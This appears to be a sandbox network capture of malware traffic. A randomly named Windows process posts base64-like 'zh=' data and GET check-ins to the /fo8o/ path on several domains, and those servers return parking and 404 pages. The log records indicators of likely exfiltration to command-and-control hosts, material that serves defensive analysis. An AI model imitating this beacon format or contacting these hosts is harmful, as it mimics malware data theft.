                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            10 | 192.168.2.11 | 49985 | 91.195.240.94 | 80 | 3796 | C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 25, 2024 13:59:36.616699934 CET | 796 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.rssnewscast.com
                                                                            Origin: http://www.rssnewscast.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Referer: http://www.rssnewscast.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Ascii: zh=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBzynW45ViOoLhdhmaC7qJPSzg2PL2yb4Q8=
                                                                            Nov 25, 2024 13:59:37.935906887 CET  707  IN  HTTP/1.1 405 Not Allowed
                                                                            date: Mon, 25 Nov 2024 12:59:37 GMT
                                                                            content-type: text/html
                                                                            content-length: 556
                                                                            server: Parking/1.0
                                                                            connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                                            11          192.168.2.11  49986        91.195.240.94   80                3796  C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                            Nov 25, 2024 13:59:39.553529024 CET  1809  OUT  POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.rssnewscast.com
                                                                            Origin: http://www.rssnewscast.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 1231
                                                                            Referer: http://www.rssnewscast.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 59 42 31 64 62 75 6d 32 33 67 59 51 33 54 6c 48 6f 6c 65 44 6d 75 4b 79 67 64 33 61 75 7a 31 66 75 45 79 69 76 6e 59 69 4f 6d 6c 77 4e 56 45 4f 68 4f 31 36 35 63 4f 37 32 6c 69 68 4e 46 4c 78 6b 59 43 6a 56 6b 52 78 4d 79 6c 4c 70 48 69 2f 7a 71 65 4a 48 49 31 64 75 30 31 42 36 61 46 56 45 43 2b 47 4b 39 57 4a 55 36 67 59 4a 55 4f 65 63 43 6a 7a 4b 39 73 77 44 61 61 79 62 38 5a 6d 48 5a 65 4a 2f 34 4f 53 53 44 72 58 4f 71 52 44 79 73 57 66 4e 33 69 72 64 62 46 68 52 78 48 61 73 64 47 4a 38 [TRUNCATED]
                                                                            Data Ascii: zh= [TRUNCATED]
                                                                            Nov 25, 2024 13:59:40.838114977 CET  707  IN  HTTP/1.1 405 Not Allowed
                                                                            date: Mon, 25 Nov 2024 12:59:40 GMT
                                                                            content-type: text/html
                                                                            content-length: 556
                                                                            server: Parking/1.0
                                                                            connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                                            12          192.168.2.11  49987        91.195.240.94   80                3796  C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                            Nov 25, 2024 13:59:42.208904982 CET  508  OUT  GET /fo8o/?zh=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4Jw8jmqxLw67/BJwdjwjaFneB0YC/Adw7Wc=&HpnH2=lZrlsdK8B4Q HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.rssnewscast.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 25, 2024 13:59:43.521635056 CET  1236  IN  HTTP/1.1 200 OK
                                                                            date: Mon, 25 Nov 2024 12:59:43 GMT
                                                                            content-type: text/html; charset=UTF-8
                                                                            transfer-encoding: chunked
                                                                            vary: Accept-Encoding
                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                            pragma: no-cache
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_K35tBrXEVk960fltQuGDhIoBliRqTSIgZv4vttQe06Es7VmSTDzuE+etsQdn6hOEYRpHlpyGCpQFOeC6mdhw7Q==
                                                                            last-modified: Mon, 25 Nov 2024 12:59:43 GMT
                                                                            x-cache-miss-from: parking-7ffff5845f-cjvf9
                                                                            server: Parking/1.0
                                                                            connection: close
                                                                            Data Raw: 32 45 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 4b 33 35 74 42 72 58 45 56 6b 39 36 30 66 6c 74 51 75 47 44 68 49 6f 42 6c 69 52 71 54 53 49 67 5a 76 34 76 74 74 51 65 30 36 45 73 37 56 6d 53 54 44 7a 75 45 2b 65 74 73 51 64 6e 36 68 4f 45 59 52 70 48 6c 70 79 47 43 70 51 46 4f 65 43 36 6d 64 68 77 37 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED]
                                                                            Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_K35tBrXEVk960fltQuGDhIoBliRqTSIgZv4vttQe06Es7VmSTDzuE+etsQdn6hOEYRpHlpyGCpQFOeC6mdhw7Q==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informati
                                                                            Nov 25, 2024 13:59:43.521660089 CET  1236  IN  Data Raw: 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66
                                                                            Data Ascii: on youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are search1062ing for!"><link rel="icon" type="image/png" href="//img
                                                                            Nov 25, 2024 13:59:43.521671057 CET  1236  IN  Data Raw: 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a
                                                                            Data Ascii: ine-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,se
                                                                            Nov 25, 2024 13:59:43.521814108 CET  672  IN  Data Raw: 63 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f
                                                                            Data Ascii: ch]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:
                                                                            Nov 25, 2024 13:59:43.521828890 CET  1236  IN  Data Raw: 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 72 65 6c 61 74 65 64 6c 69 6e 6b 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 61 64 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e
                                                                            Data Ascii: ontent__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-top:9%}.container-content__container-ads{margin-top:8%}.container-
                                                                            Nov 25, 2024 13:59:43.521848917 CET  1236  IN  Data Raw: 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64
                                                                            Data Ascii: ier-ads-list__list-element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline}.two-tier-ads-list__list-element-link:hover,.two-tier-ads-list__list-element-link:active,.two-tier-ads-list__list-element-link:focus{t
                                                                            Nov 25, 2024 13:59:43.521859884 CET  1236  IN  Data Raw: 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 5f 5f 73 65 61 72 63
                                                                            Data Ascii: line-block;font-family:arial,sans-serif;font-size:12px}.container-searchbox__searchtext-label{display:none}.container-searchbox__input,.container-searchbox__button{border:0 none}.container-searchbox__button{cursor:pointer;font-size:12px;margin
                                                                            Nov 25, 2024 13:59:43.521872044 CET  1236  IN  Data Raw: 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 35 25 3b 6d
                                                                            Data Ascii: _content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.container-cookie-message__content-interactive{text-align:left;margin:0 15px;font-size:10px}.container-cookie-message__content-interactive-header
                                                                            Nov 25, 2024 13:59:43.521934032 CET  1236  IN  Data Raw: 69 65 73 2d 72 6f 77 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 65 65 31 65 33 7d 2e 64 69 73 61 62 6c 65 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7a 2d 69 6e 64 65 78 3a 2d 39 39 39 7d 2e 62 74 6e 7b 64 69 73 70 6c 61 79 3a
                                                                            Data Ascii: ies-row{background-color:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:inline-block;border-style:solid;border-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success
                                                                            Nov 25, 2024 13:59:43.521944046 CET  1236  IN  Data Raw: 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 3a 62 65 66 6f 72 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 68 65 69 67 68 74 3a 32 36 70 78 3b 77 69 64 74 68 3a 32 36 70 78 3b 6c 65 66 74 3a 34
                                                                            Data Ascii: }.switch__slider:before{position:absolute;content:"";height:26px;width:26px;left:4px;bottom:4px;background-color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:before{border-radius:5
                                                                            Nov 25, 2024 13:59:43.641900063 CET  1236  IN  Data Raw: 73 51 64 6e 36 68 4f 45 59 52 70 48 6c 70 79 47 43 70 51 46 4f 65 43 36 6d 64 68 77 37 51 3d 3d 22 2c 22 74 69 64 22 3a 33 30 34 39 2c 22 62 75 79 62 6f 78 22 3a 66 61 6c 73 65 2c 22 62 75 79 62 6f 78 54 6f 70 69 63 22 3a 74 72 75 65 2c 22 64 69
                                                                            Data Ascii: sQdn6hOEYRpHlpyGCpQFOeC6mdhw7Q==","tid":3049,"buybox":false,"buyboxTopic":true,"disclaimer":true,"imprint":false,"searchbox":true,"noFollow":false,"slsh":false,"ppsh":true,"dnhlsh":true,"toSellUrl":"","toSellText":"","searchboxPath":"//www.rss


                                                                            Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                                            13          192.168.2.11  49988        66.29.149.46    80                3796  C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                            Nov 25, 2024 13:59:57.840353966 CET  776  OUT  POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.techchains.info
                                                                            Origin: http://www.techchains.info
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Referer: http://www.techchains.info/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 4a 73 71 2f 63 79 42 39 4b 44 49 4c 65 52 30 63 35 48 4d 6a 79 47 31 43 37 57 5a 68 6a 50 75 73 66 51 3d 3d
                                                                            Data Ascii: zh=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXJsq/cyB9KDILeR0c5HMjyG1C7WZhjPusfQ==
                                                                            Nov 25, 2024 13:59:59.209700108 CET  637  IN  HTTP/1.1 404 Not Found
                                                                            Date: Mon, 25 Nov 2024 12:59:58 GMT
                                                                            Server: Apache
                                                                            Content-Length: 493
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                            Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                                            14          192.168.2.11  49989        66.29.149.46    80                3796  C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                            Nov 25, 2024 14:00:00.487298965 CET  796  OUT  POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.techchains.info
                                                                            Origin: http://www.techchains.info
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Referer: http://www.techchains.info/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 39 41 76 77 34 52 71 2b 4c 6c 45 56 6d 4c 76 34 46 42 53 6f 6d 4c 65 59 72 64 6e 4b 6a 59 2f 51 51 3d
                                                                            Data Ascii: zh=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xV9Avw4Rq+LlEVmLv4FBSomLeYrdnKjY/QQ=
                                                                            Nov 25, 2024 14:00:01.779647112 CET  637  IN  HTTP/1.1 404 Not Found
                                                                            Date: Mon, 25 Nov 2024 13:00:01 GMT
                                                                            Server: Apache
                                                                            Content-Length: 493
                                                                            Connection: close
                                                                            Content-Type: text/html
